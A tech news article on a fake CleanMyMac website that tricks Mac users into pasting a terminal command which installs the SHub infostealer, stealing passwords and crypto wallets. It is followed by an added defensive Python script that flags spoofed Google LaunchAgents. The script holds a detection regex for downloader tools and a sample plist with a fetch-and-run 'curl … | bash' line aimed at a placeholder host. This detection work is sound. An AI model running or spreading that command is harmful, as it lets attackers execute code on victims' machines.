'macOS is becoming a more attractive target, and the tools attackers use are becoming more capable and more professional': Experts warn 'convincing' fake CleanMyMac installs target Apple users to empty crypto wallets
A fake website, a ClickFix, and an infostealer
- Fake CleanMyMac utility spreads SHub infostealer
- Attack tricks users into pasting terminal commands
- Malware steals credentials, crypto, and persists via backdoor
A fake utility program for macOS is tricking users into installing infostealer malware that exfiltrates passwords, sensitive files, and even money, experts have warned.
Security researchers at Malwarebytes said the program was part of a wider, highly sophisticated campaign which also included a custom website, reputable brand spoofing, a loader, and the good old ClickFix approach.
The researchers said the campaign spoofed CleanMyMac, a legitimate Mac optimization program built by MacPaw, creating an almost identical website on the cleanmymacos[DOT]org domain, which makes it easy for people to mistake it for the real one. However, instead of simply downloading and running an installer, the victims are asked to open a terminal and paste a command that fetches the payload from a third-party server.
Stealing files and establishing persistence
“Instead of exploiting a vulnerability, it tricks the user into running the malware themselves,” Malwarebytes explained. “Because the command is executed voluntarily, protections such as Gatekeeper, notarization checks, and XProtect offer little protection once the user pastes the command and presses Return.”
The malware being installed this way is called SHub, and during installation, it will ask the victim for their macOS password. Since the entire installation process is somewhat unorthodox and could look like something a power user would do, users might dismiss it as standard practice, the researchers explained.
However, the password actually gives SHub access to the macOS Keychain, Wi-Fi credentials, app tokens, and other private keys.
“With the password in hand, SHub begins a systematic sweep of the machine,” the Malwarebytes researchers said.
After stealing passwords, cookies, autofill data, crypto wallet extensions, iCloud account data, Telegram session files, and other valuables, it drops a stage-two backdoor which replaces some cryptocurrency wallet apps with malicious copies. That way, the malware maintains persistence and even enables additional crypto theft down the line.
Finally, the crooks install a LaunchAgent disguised as a Google update service.
“In practice, this gives the attackers the ability to run commands on the infected Mac at any time until the persistence mechanism is discovered and removed,” the report concluded.
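The LaunchAgent persistence described above is something defenders can audit for directly. The following is an added example, not code from Malwarebytes, MacPaw or the article; it assumes genuine Google update agents live under a Library/Google path (GOOGLE_PATH_HINT), and the sample plists it checks are constructed, not real artifacts.

```python
# Added example (not Malwarebytes' or MacPaw's code): flag LaunchAgent plists that
# look like the spoofed "Google update" persistence described above. The heuristics
# and the assumed Google install path (GOOGLE_PATH_HINT) are illustrative assumptions.
import plistlib
import re
from pathlib import Path

SHELLS = {"sh", "bash", "zsh", "osascript"}
LOADER = re.compile(r"\b(curl|wget|base64|nohup)\b")  # no place in an updater
GOOGLE_PATH_HINT = "/Library/Google/"  # assumed home of genuine Google agents

def audit_launch_agent(plist_bytes: bytes) -> list[str]:
    """Return findings for one LaunchAgent plist; an empty list means clean."""
    agent = plistlib.loads(plist_bytes)
    label = str(agent.get("Label", "")).lower()
    args = [str(a) for a in (agent.get("ProgramArguments") or [agent.get("Program", "")])]
    if not args[0]:
        return ["nothing to run: missing Program/ProgramArguments"]
    findings = []
    # 1. Label borrows Google's name but the binary is outside Google's install tree.
    if ("google" in label or "keystone" in label) and not any(GOOGLE_PATH_HINT in a for a in args):
        findings.append(f"label '{label}' spoofs Google but runs {args[0]}")
    # 2. The "program" is a shell one-liner: a pasted ClickFix command made persistent.
    if Path(args[0]).name in SHELLS and "-c" in args:
        findings.append(f"{Path(args[0]).name} -c wrapper in ProgramArguments")
    if LOADER.search(" ".join(args)):
        findings.append("downloader/decoder invoked at launch")
    # 3. Persistence flags: relaunched at login and again whenever it is killed.
    if findings and agent.get("RunAtLoad") and agent.get("KeepAlive"):
        findings.append("RunAtLoad+KeepAlive set")
    return findings

def audit_directory(directory: str = "~/Library/LaunchAgents") -> dict[str, list[str]]:
    """Scan every .plist in a LaunchAgents folder and keep only flagged entries."""
    report = {}
    for plist in Path(directory).expanduser().glob("*.plist"):
        try:
            found = audit_launch_agent(plist.read_bytes())
        except (plistlib.InvalidFileException, ValueError) as err:
            found = [f"unparseable plist: {err}"]
        if found:
            report[plist.name] = found
    return report

# Constructed samples (not real artifacts): an updater-style entry and a spoofed one.
BENIGN = plistlib.dumps({"Label": "com.google.keystone.agent", "RunAtLoad": True,
    "ProgramArguments": ["/Users/me/Library/Google/GoogleSoftwareUpdate/Agent"]})
SPOOFED = plistlib.dumps({"Label": "com.google.update.agent", "RunAtLoad": True,
    "KeepAlive": True, "ProgramArguments": ["/bin/bash", "-c",
    "curl -s http://example.invalid/stage | bash"]})
```

Run `audit_directory()` on a Mac to review the current user's LaunchAgents; a clean entry produces no findings, while an agent that only carries Google's name in its label is reported with each reason it tripped.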

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.